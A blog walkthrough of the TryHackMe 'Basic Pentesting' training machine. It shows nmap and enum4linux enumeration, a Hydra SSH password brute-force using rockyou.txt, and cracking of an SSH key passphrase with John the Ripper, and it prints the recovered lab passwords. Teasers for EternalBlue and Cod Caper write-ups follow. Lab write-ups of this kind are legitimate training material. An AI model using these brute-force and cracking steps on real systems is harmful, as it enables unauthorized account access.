[ Basics Penetration Testing ] - TRYHACKME

By -




[ Basics Penetration Testing ] - TRYHACKME.COM 

This article is for basics penetration testing 

1. Deploy the machine and connect to the tryhackme network.
2. Find the service exposed by the machine.

For finding the service here we can use nmap 

nmap -sC -sV -oN initial <machine_ip>

# Nmap 7.80 scan initiated Sun Sep 27 11:26:39 2020 as: nmap -sC -sV -oN initial 10.10.38.194
Nmap scan report for 10.10.38.196
Host is up (0.077s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:

|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2020-03-22T06:26:54-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-22T10:26:54
|_  start_date: N/A


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 22 11:26:58 2020 -- 1 IP address (1 host up) scanned in 19.80 seconds
we have 3 open ports
22: SSH
139 and 445: smbd

If we open this IP in the browser we see a server running


3. What is the name of the hidden directory on the web server (enter name without /)?

we could use gobuster for directory brute-force. We have a hint here so let's try it first. /development is the directory find by the gobuster.


4. User brute-force to find the username and password
5. What is the username?

We have smbd open, we can use enum4linux for that.

enum4linux -a <machine_ip>

2 users pop up jan a.k.a j and kay a.k.a k

6. What is the password? + 7. What service do you use to access the server(answer in abbreviation in all cap)?

Password is pretty simple, a brute-force approach should unlock it.

We have information about the open ports. SSH is the great candidate for Hydra. A common password dictionary is provided by the kali linux named rockyou.txt you will find this dict in /usr/share/wordlists/rockyou.txt. This dictionary contains the 14,341,564 unique passwords, used in 32,603,388 accounts.

$ hydra -l jan -P rockyou.txt ssh:<ip>

login: jan   password: armando

8. Enumerate the machine to find any vectors for privilege escalation

9. What is the name of the other user you found(all lower case)?

We have already information form number 5.


10. If you have found another user, what can you do with this information? + 11. What is the final password you obtain?

Now, we can login with ssh using jan. But listing jan's directory doesn't give any information, but we have one more username kay.
Found the id_rsa and id_rsa.pub and the backup file name pass.back.

$ ssh -i id_rsa kay@<IP>

Enter passphrase for key 'id_rsa':
Here required passphrase for access the machine.

We can user JohnTheRipper for cracking the Key.

$ python /usr/share/john/ssh2john.py kay_id_rsa > id_rsa.txt

$ johntheripper id_rsa.txt --wordlist=/opt/rockyou.txt
...
beeswax   (thm/kay/id_rsa)
Now, we can login as kay with this public key and also we can see the pass.back file.

$ ssh -i id_rsa kay@<IP>

$ cat pass.back

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Hello World!! I am Mayank Srivastava and i am graduated in computer application from Veer Bahadur Singh Purvanchal University. And I post tutorials on programming languages. I'd like to share some of my knowledge with everyone. And also i am interested in Cyber Security Penetration Testing.

Comments

Post a Comment

Popular posts from this blog

[ Blue ] - TRYHACKME

By -
Image
Hello guys Today i am going to do walkthrough on the machine called Blue. This is very easy box based on the vulnerability of EternalBlue( CVE-2017-0143 ). As usual first thing we are going to do is scanning the network using the nmap tool to see which ports are open and which services are running on this machine. The flags used in the nmap scan are: -sS - for a syn scan -sV -for a service version scan -O - to identify the OS used -T4 - the speed of scan -open - to show only the open ports We notice the service running on the port 445 is SMB so we can use nmap script engine to verify this service is vulnerable or not for EternalBlue vulnerability. The flags used are: -p - to test only the port provided(in this case 445) --script=smb-vuln-ms17-010 - the nmap script to run against our target The output of the scan is shown us to machine is vulnerable. Metasploit already has this exploit, so let's fire it up to gain access. To start the metasploit console just run the command msfco...
Read more

[ The Cod Caper ] - TRYHACKME

By -
Image
    Check out the room https://tryhackme.com/room/thecodcaper Hello everyone  this is another walkthrough blog of tryhackme, this room contains some trick to crack the linux machines root password. Room name : The Cod Caper Machine Type : Linux Task 2  We'll run nmap on the target # nmap -sV -A -p1-1000 -T4 -oN initial <target-machine-ip> Task 3 As recommended in tryhackme the cod caper room we'll use  gobuster  for the directory checking the wordlist for  gobuster  is in the task for downloading. Don't forget to user  -x  flag for specific extension search like ". html, .txt, .php " # gobuster dir -u <target_url> -w "path/of/wordlist" -x ".php" -x flag is important because we have to check the specific extension like ".html, .php" After gobuster directory bruteforcing we have admin page for login but we don't have username and password for login so we have to find the username and password to access the page. Task 4 W...
Read more